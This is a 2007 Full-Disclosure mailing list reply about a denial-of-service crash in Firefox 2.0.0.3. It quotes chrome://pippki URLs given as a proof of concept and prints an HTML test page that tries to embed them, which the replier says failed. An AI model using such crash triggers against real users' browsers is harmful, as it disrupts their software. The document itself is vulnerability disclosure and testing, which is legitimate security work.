[Full-disclosure] Firefox 2.0.0.3 DoS crash
Tõnu Samuel
tonu at jes.ee
Fri Apr 20 17:25:30 BST 2007
On Thu, 2007-04-19 at 20:22 +0200, carl hardwick wrote:
> Firefox 2.0.0.3 DoS crash
>
> PoC:
> chrome://pippki/content/editcacert.xul
> chrome://pippki/content/editemailcert.xul
> chrome://pippki/content/editsslcert.xul
Works for me on Linux when clicking on such link.
Meanwhile I tried to embed it into webpage and did not work.
tonu at duo:~/Desktop> cat poc.html
<html>
<body>
<img src="chrome://pippki/content/editcacert.xul" />
<iframe src="chrome://pippki/content/editcacert.xul" ></iframe>
<object src="chrome://pippki/content/editcacert.xul"
type="text/html"></object>
<script src="chrome://pippki/content/editcacert.xul" ></script>
</body>
</html>
tonu at duo:~/Desktop>
Full-Disclosure is hosted and sponsored by Secunia.